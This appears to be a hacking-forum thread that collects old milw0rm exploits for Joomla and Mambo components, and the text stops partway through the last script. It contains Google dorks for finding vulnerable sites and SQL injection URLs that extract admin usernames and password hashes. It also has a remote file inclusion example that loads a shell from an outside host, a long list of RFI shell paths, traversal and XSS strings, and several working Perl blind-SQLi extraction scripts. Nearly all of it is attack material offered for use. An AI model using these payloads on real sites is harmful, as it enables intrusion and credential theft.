100.000 DEN FAZLA MAMBO NE JOOMLA WEBSiTESi
YASGUNUM NEDENiYLE HEDiYE
iYi SANLAR

you can see all my exploits

http://my.opera.com/SQL-Injection/blog/

###########################################
#
# DORK 1 : allinurl: "com_restaurante"
#
###########################################
EXPLOIT :

index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/*


###########################################
##################S@BUN####################
###########################################
#####
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]#####
###########################################

side note:
	<name>Restaurante</name>
	<author>Detodas</author>
	<creationDate>31-07-2007</creationDate>
	<license>This component is released under the GNU/GPL License</license>
	<authorEmail>
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]</authorEmail>

	<authorUrl>www.detodo.masde50.net</authorUrl>
	<version>1.0</version>
	<description>The structure of this component is based on the structure of the component Alberghi by Vamba</description>

# milw0rm.com [2008-03-19]

milw0rm.com

[b!atnoy]

Joomla Component Datsogallery 1.3.1 Remote SQL Injection Vulnerability

Код:

Cr@zy_King


[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ].uk / hackshow.us

Joomla Component com_datsogallery remote SQL Injection

Version : v1.3.1

index.php?option=com_datsogallery&func=detail&id='Sql

Sql : union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*

++++++++++++++++++++++++Güç Benim Degil İntikamın Gücü.+++++++++++++++++++++++++++++++

Greatz : Crackers_Child - Eno7 - The_Bekir - Dreamturk - Ghost61 - UyuSsman - Tilkiandre - Mhzr91

Special Greatz : str0ke - 3php

# milw0rm.com [2008-03-20]

[b!atnoy]

Joomla Components custompages 1.1 Remote File Inclusion Vulnerability

Код:

@ JOOmla Component custompages <= 1.0 Sql Remote file Inclusion


Author:Sniper456

Contact:Sniper456[attt]gmail.com

Greetss: My chilean people

Developer: Shawn Sandy

License:Other open source / Free license

Dork: 8=====B !           =)

**Bug:

http://www.target.com/index.php?option=com_custompages&cpage=URL

**Example

http://www.target.com/index.php?option=com_custompages&cpage=http://atackweeb.cl/colocoloshell.txt?

side note:

 <name>custompages</name>
 <creationDate>06/11/2006</creationDate>
 <author>Shawn Sandy</author>
 <copyright>Copyright 2006 - Shawn Sandy</copyright>
 <license>License</license>
 <authorEmail>
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]</authorEmail>
 <authorUrl>www.sstreamtv.com</authorUrl>
 <version>1.1</version>

# milw0rm.com [2008-03-22]

[b!atnoy]

Joomla Component joomlaXplorer <= 1.6.2 Remote Vulnerabilities

Код:

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : HouSSaMix                          
= Script : Joomla and Mambo Component joomlaxplorer  
= version : 1.6.0
= Download : http://joomlacode.org/gf/project/joomlaxplorer

= Dork1 : inurl:index.php?option=com_joomlaxplorer
= Dork2 : powered by joomlaXplorer
          			           
							   
= BUG 1 :  Local Directory Traversal 

exploit => target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=../../[directory]

example :
  site.com/joomla/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
  site.com/joomla/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed

= BUG 2 : XSS

exploit => target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=hsmx&order=name&srt=yes&error=[XSS]
 
example : www.target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=hsmx&order=name&srt=yes&error=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
       

= greetz :	V4 Team - Jiki Team - Gold_M - HaCkeR_EgY - RoMaNcYxHaCkEr and all muslims Hackers

side note:
    <name>joomlaXplorer</name>
    <creationDate>18.09.2007</creationDate>
    <author>soeren, QuiX Project</author>
    <copyright>Soeren Eberhardt-Biermann, QuiX Project</copyright>
    <authorEmail>
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]</authorEmail>

    <authorUrl>http://joomlacode.org/gf/project/joomlaxplorer/</authorUrl>
    <version>1.6.2</version>

# milw0rm.com [2008-04-11]

[b!atnoy]

Joomla Component com_extplorer <= 2.0.0 RC2 SQL Injection Vuln

Код:

--------------------------------------------------------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
--------------------------------------------------------------------------------------------------------------

= Author : HouSSaMix                          
= Script : Joomla and Mambo Component com_extplorer
= version : <= 2.0.0 RC2
= Download : http://joomlacode.org/gf/download/frsrelease/6717/21992/com_extplorer_2.0.0_RC2.zip

= Dork1 : inurl:index.php?option=com_extplorer
= Dork2 : powered by extplorer
          			           
							   
= BUG  :  Local Directory Traversal 

exploit => target.com/path/index.php?option=com_extplorer&action=show_error&dir=../../[directory]

example :
  site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
  site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed

= greetz :	V4 Team - Jiki Team - Gold_M - HaCkeR_EgY - RoMaNcYxHaCkEr and all muslims Hackers

=================================================================================================================

# milw0rm.com [2008-04-13]

[balt]

Google Dork:

inurl:"com_admin"

Site Sonuna:

administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell



Google Dork:

inurl:index.php?option=com_simpleboard

Site Sonuna:

/components/com_simpleboard/file_upload.php?sbp=shell


Google Dork:
inurl:"com_hashcash"

Site Sonuna:

/components/com_hashcash/server.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_htmlarea3_xtd-c"

Code:

/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_sitemap"

Code:

/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_performs"

Site Sonuna:
components/com_performs/performs.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_forum"

Site Sonuna:
/components/com_forum/download.php?phpbb_root_path=



Google Dork:
inurl:"com_pccookbook"

Site Sonuna:

components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell



Google Dork:
inurl:index.php?option=com_extcalendar

Site Sonuna:

/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"minibb"

Site Sonuna:
components/minibb/index.php?absolute_path=shell



Google Dork:
inurl:"com_smf"

Site Sonuna:
/components/com_smf/smf.php?mosConfig_absolute_path=
Site Sonuna2:
/modules/mod_calendar.php?absolute_path=shell



Google Dork:
inurl:"com_pollxt"

Site Sonuna:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell

Google Dork:
inurl:"com_loudmounth"

Site Sonuna:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_videodb"

Site Sonuna:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l



Google Dork:
inurl:index.php?option=com_pcchess

Site Sonuna:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_multibanners"

Site Sonuna:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell



Google Dork:
inurl:"com_a6mambohelpdesk"

Site Sonuna:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shel l



Google Dork:
inurl:"com_colophon"

Site Sonuna:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_mgm"

Site Sonuna:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell

Google Dork:
inurl:"com_mambatstaff"

Site Sonuna:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_securityimages"

Site Sonuna:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell

Site Sonuna2:
/components/com_securityimages/lang.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_artlinks"

Site Sonuna:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_galleria"

Site Sonuna:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_akocomment"

Site Sonuna:
/akocomments.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_cropimage"

Site Sonuna:
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell



Google Dork:
inurl:"com_kochsuite"

Site Sonuna:
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_comprofiler"

Site Sonuna:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_zoom"

Site Sonuna:
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell
Site Sonuna2:
/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_serverstat"

Site Sonuna:
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll



Google Dork:
inurl:"com_fm"

Site Sonuna:
components/com_fm/fm.install.php?lm_absolute_path=shell




Google Dork:
inurl:com_mambelfish

Site Sonuna:
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell




Google Dork:
inurl:com_lmo


Site Sonuna:
components/com_lmo/lmo.php?mosConfig_absolute_path=shell





Google Dork:
inurl:com_linkdirectory


Site Sonuna:
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell




Google Dork:
inurl:com_mtree


Site Sonuna:
components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell





Google Dork:
inurl:com_jim


Site Sonuna:
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell





Google Dork:
inurl:com_webring


Site Sonuna:
administrator/components/com_webring/admin.webring.docs.php?component_dir=shell





Google Dork:
inurl:com_remository


Site Sonuna:
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=



Google Dork:
inurl:com_babackup


Site Sonuna:
administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell



Google Dork:
inurl:com_lurm_constructor


Site Sonuna:
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell






Google Dork:
inurl:com_mambowiki


Site Sonuna:
components/com_mambowiki/ MamboLogin.php?IP=shell




Google Dork:
inurl:com_a6mambocredits


Site Sonuna:
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell






Google Dork:
inurl:com_phpshop


Site Sonuna:
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell






Google Dork:
inurl:com_cpg


Site Sonuna:
components/com_cpg/cpg.php?mosConfig_absolute_path=shell






Google Dork:
inurl:com_moodle


Site Sonuna:
components/com_moodle/moodle.php?mosConfig_absolute_path=shell




Google Dork:
inurl:com_extended_registration


Site Sonuna:
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell




Google Dork:
inurl:com_mospray


Site Sonuna:
components/com_mospray/scripts/admin.php?basedir=shell

Google Dork:
inurl:com_bayesiannaivefilter

Site Sonuna:
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell



Google Dork:
inurl:com_uhp

Site Sonuna:
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell



Google Dork:
inurl:com_peoplebook

Site Sonuna:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell

Google Dork:
inurl:com_mmp

Site Sonuna:
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell

Google Dork:
inurl:com_reporter

Site Sonuna:
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell

Google Dork:
inurl:com_madeira

Site Sonuna:
/components/com_madeira/img.php?url=shell


Google Dork:
inurl:com_jd-wiki

Site Sonuna:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell



Google Dork:
inurl:com_bsq_sitestats

Site Sonuna:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
Site Sonuna2:
/com_bsq_sitestats/external/rssfeed.php?baseDir=shell

[balt]

Уязвимости в компонентах Joomla

Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability

Код:

#!/usr/bin/perl -w

#   Mambo Component mambads  1.0 RC1 Beta & 1.0 RC1 Remote SQL Injection #
########################################
#[*] Found by : Houssamix From H-T Team
#[*] H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo
#[*] Greetz : Stack & CoNaN & HaCkeR_EgY & room-hacker & Hak3r-b0y & All friends & All muslims HaCkeRs  :)
#[*] Script_Name: "Mambo"
#[*] Component_Name: mambads  1.0 RC1 Beta & 1.0 RC1
#[*] Dork: index.php?option=com_mambads


system("color f");
print "\t\t########################################################\n\n";
print "\t\t#                        Viva Islam                    #\n\n";
print "\t\t########################################################\n\n";
print "\t\t# Mambo Component mambads  Remote SQL Injection          #\n\n";
print "\t\t# H-T Team [HouSSaMiX - ToXiC350]                      #\n\n";
print "\t\t########################################################\n\n";

use LWP::UserAgent;

print "\nEnter your Target (http://site.com/mambo/): ";
    chomp(my $target=<STDIN>);

$uname="username";
$passwd="password";
$magic="mos_users";
$pass1="imambo";
$pass2="aspen";
$pass3="ligio";
$pass4="qwally";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "/index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%20union%20select%20concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62))from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

print "\n[+] The Target : ".$target."";

if ($answer =~ /<user>(.*?)<user>/){
      
        print "\n[+] Admin User : $1";
}
$host2 = $target . "/index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%20union%20select%20".$passwd."/**/from/**/".$magic."/**";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
        print "\n[+] Admin Hash : $1\n\n";
        print "#   Exploit succeed!  #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}
if ($answer =~/697d54f398600b7ff10860a4422a6ea3/){print "[+] md5 cracked :".$pass4."\n\n";}
if ($answer =~/53138ba09b49380fea0aa99bb9ab511d/){print "[+] md5 cracked :".$pass3."\n\n";}
if ($answer =~/68e3d2564cb5858e2b69f1f49dfe40a3/){print "[+] md5 cracked :".$pass1."\n\n";}
if ($answer =~/91a343c02e6c4e10b023216ecfcd69e7/){print "[+] md5 cracked :".$pass2."\n\n";}

# codec  by Houssamix From H-T Team
# special thx to : StaCk

Joomla Component com_extplorer <= 2.0.0 RC2 SQL Injection Vuln

Код:

--------------------------------------------------------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
--------------------------------------------------------------------------------------------------------------

= Author : HouSSaMix                          
= Script : Joomla and Mambo Component com_extplorer
= version : <= 2.0.0 RC2
= Download : http://joomlacode.org/gf/download/frsrelease/6717/21992/com_extplorer_2.0.0_RC2.zip

= Dork1 : inurl:index.php?option=com_extplorer
= Dork2 : powered by extplorer
                                
                              
= BUG  :  Local Directory Traversal

exploit => target.com/path/index.php?option=com_extplorer&action=show_error&dir=../../[directory]

example :
  site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
  site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed

= greetz :    V4 Team - Jiki Team - Gold_M - HaCkeR_EgY - RoMaNcYxHaCkEr and all muslims Hackers

================================================================================
=================================

Joomla Component joomlaXplorer <= 1.6.2 Remote Vulnerabilities

Код:

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : HouSSaMix                          
= Script : Joomla and Mambo Component joomlaxplorer  
= version : 1.6.0
= Download : http://joomlacode.org/gf/project/joomlaxplorer

= Dork1 : inurl:index.php?option=com_joomlaxplorer
= Dork2 : powered by joomlaXplorer
                                
                              
= BUG 1 :  Local Directory Traversal

exploit => target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=../../[directory]

example :
  site.com/joomla/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
  site.com/joomla/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed

= BUG 2 : XSS

exploit => target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=hsmx&order=name&srt=yes&error=[XSS]

example : www.target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=hsmx&order=name&srt=yes&error=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
      

= greetz :    V4 Team - Jiki Team - Gold_M - HaCkeR_EgY - RoMaNcYxHaCkEr and all muslims Hackers

side note:
    <name>joomlaXplorer</name>
    <creationDate>18.09.2007</creationDate>
    <author>soeren, QuiX Project</author>
    <copyright>Soeren Eberhardt-Biermann, QuiX Project</copyright>
    <authorEmail>
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]</authorEmail>

    <authorUrl>http://joomlacode.org/gf/project/joomlaxplorer/</authorUrl>
    <version>1.6.2</version>

Joomla Component rapidrecipe Remote SQL injection Vulnerability

Код:

/---------------------------------------------------------------\
\                                                /
/       Joomla Component rapidrecipe Remote SQL injection       \
\                                                /
\---------------------------------------------------------------/

[*] Author    :  His0k4 [ALGERIAN HaCkEr]
[*] Dork      :  inurl:com_rapidrecipe "recipe_id"
[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id={SQL}
[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

                
----------------------------------------------------------------------------[*] Greetings :  Str0ke, all friends & muslims HaCkeRs...[*] Greetings2:  http://palcastle.org/cc

Joomla Component yvcomment <= 1.16 Blind SQL Injection Exploit

Код:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                        \n";
  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  print "  o   Joomla Component yvcomment Blind SQL Injection Exploit            o\n";
  print "  o   Author:His0k4 [ALGERIAN HaCkeR]                                   o\n";
  print "  o                                                                     o\n";
  print "  o   Conctact: His0k4.hlm[at]gamil.com                                 o\n";
  print "  o   Greetz:   All friends & muslims HacKeRs                           o\n";
  print "  o                                                                     o\n";
  print "  o   Dork :   inurl:yvcomment                                          o\n";
  print "  o   Usage:   perl yvcomment.pl host path <options>                    o\n";
  print "  o   Example: perl yvcomment.pl www.host.com /joomla/ -a 2             o\n";
  print "  o                                                                     o\n";
  print "  o   Options:                                                          o\n";
  print "  o     -a   valid Article id                                           o\n";
  print "  o   Note:                                                             o\n";
  print "  o You can Change the match string by any content of the correct query o\n";
  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $aid     = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"a"})
{
  $aid = $options{"a"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $aid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $aid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid   = shift;
  my $aid   = shift;
  my $i     = shift;
  my $h     = shift;

  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_yvcomment&view=comment&ArticleID=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=".$h."";

  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }

  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "DateAndAuthor";

  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability

Код:

/---------------------------------------------------------------\
\                                                /
/         Joomla Component GameQ Remote SQL injection           \
\                                                /
\---------------------------------------------------------------/

[*] Author    :  His0k4 [ALGERIAN HaCkEr]
[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id={SQL}
[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users--

Joomla Component JoomlaDate (user) SQL injection Vulnerability

Код:

/---------------------------------------------------------------\
\                                                /
/       Joomla Component joomladate Remote SQL injection        \
\                                                /
\---------------------------------------------------------------/

[*] Author    :  His0k4 [ALGERIAN HaCkEr]
[*] Dork      :  inurl:com_joomladate[*] Dork 2    :  inurl:com_joomladate "user"
[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_joomladate&task=viewProfile&user={SQL}
[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_joomladate&task=viewProfile&user=9999999 UNION SELECT user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

                
----------------------------------------------------------------------------[*] Greetings :  Str0ke, all friends & muslims HaCkeRs...

Joomla Component simpleshop <= 3.4 SQL injection Vulnerability

Код:

---------------------------------------------------------------\
\                                                /
/       Joomla Component simpleshop Remote SQL injection        \
\                                                /
\---------------------------------------------------------------/

[*] Author    :  His0k4 [ALGERIAN HaCkEr]
[*] Dork      :  inurl:com_simpleshop[*] Dork      :  inurl:com_simpleshop "catid"
[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid={SQL}
[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--

                
----------------------------------------------------------------------------[*] Greetings :  Str0ke, all friends & muslims HaCkeRs...

Joomla Component EasyBook 1.1 (gbid) SQL Injection Exploit

Код:

#!/usr/bin/perl
use IO::Socket;
use strict;

##### INFO##############################
# Example:                             #
# Host: xxx.lu                     #
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
########################################


print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";
print "-+--                                                      --+-\n";
print "-+--            Author: ZAMUT                             --+-\n";
print "-+--            Vuln: gbid=                               --+-\n";
print "-+--            Homepage: http://antichat.ru              --+-\n";
print "-+--            Dork: com_easybook                        --+-\n\n";

print "Host:";
chomp(my $host=<STDIN>);
print "&md=";
chomp(my $md=<STDIN>);

my ($socket,$lhs,$l,$h,$s);
$socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!");
print $socket  "POST /index.php HTTP/1.0\n".
               "Host: www.$host\n".
               "Content-Type: application/x-www-form-urlencoded\n".
               "Content-Length: 214\n\n".
               "option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n";
  while(<$socket>)
  {
     $s = <$socket>;
     if($s=~/:::(.+):::/){
           $lhs = $1;
           ($l,$h,$s)=split(':',$lhs);
           print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";
           close $socket;
           exit; }
  }
  die ("Exploit failed!");

Joomla Component jotloader <= 1.2.1.a Blind SQL injection Exploit

Код:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                \n";
  print "   ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  print "   o   Joomla Component jotloader Blind SQL Injection Exploit  o\n";
  print "   o   Author:His0k4 [ALGERIAN HaCkeR]                         o\n";
  print "   o                                                           o\n";
  print "   o   Conctact: His0k4.hlm[at]gamil.com                       o\n";
  print "   o   Greetz:   All friends & muslims HacKeRs                 o\n";
  print "   o                                                           o\n";
  print "   o   Dork :   inurl:com_jotloader                            o\n";
  print "   o   Usage:   perl jotloader.pl host path <options>          o\n";
  print "   o   Example: perl jotloader.pl www.host.com /joomla/ -c 5   o\n";
  print "   o                                                           o\n";
  print "   o   Options:                                                o\n";
  print "   o     -c   valid cid  id                                    o\n";
  print "   ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $cid     = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "c=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"c"})
{
  $cid = $options{"c"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $cid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $cid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid   = shift;
  my $cid   = shift;
  my $i     = shift;
  my $h     = shift;

  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_jotloader&cid=".$cid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";

  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }

  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "files.download";

  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

[balt]

Joomla Component JooBlog 0.1.1 Blind SQL Injection Exploit

Код:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                \n";
  print "   #############################################################\n";
  print "   #   Joomla Component JooBlog Blind SQL Injection Exploit    #\n";
  print "   #   Author:His0k4 [ALGERIAN HaCkeR]                         #\n";
  print "   #                                                           #\n";
  print "   #   Conctact: His0k4.hlm[at]gamil.com                       #\n";
  print "   #   Greetz:   All friends & muslims HacKeRs                 #\n";
  print "   #   Greetz2:  http://www.palcastle.org/cc :)                #\n";
  print "   #                                                           #\n";
  print "   #   Dork :   inurl:com_jb2                                  #\n";
  print "   #   Usage:   perl jooBlog.pl host path <options>            #\n";
  print "   #   Example: perl jooBlog.pl www.host.com /joomla/ -c 5     #\n";
  print "   #                                                           #\n";
  print "   #   Options:                                                #\n";
  print "   #     -c    Category  id                                    #\n";
  print "   #############################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $cid     = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "c=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"c"})
{
  $cid = $options{"c"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $cid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $cid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid   = shift;
  my $cid   = shift;
  my $i     = shift;
  my $h     = shift;

  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_jb2&view=category&CategoryID=".$cid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";

  if($options{"p"})
  {
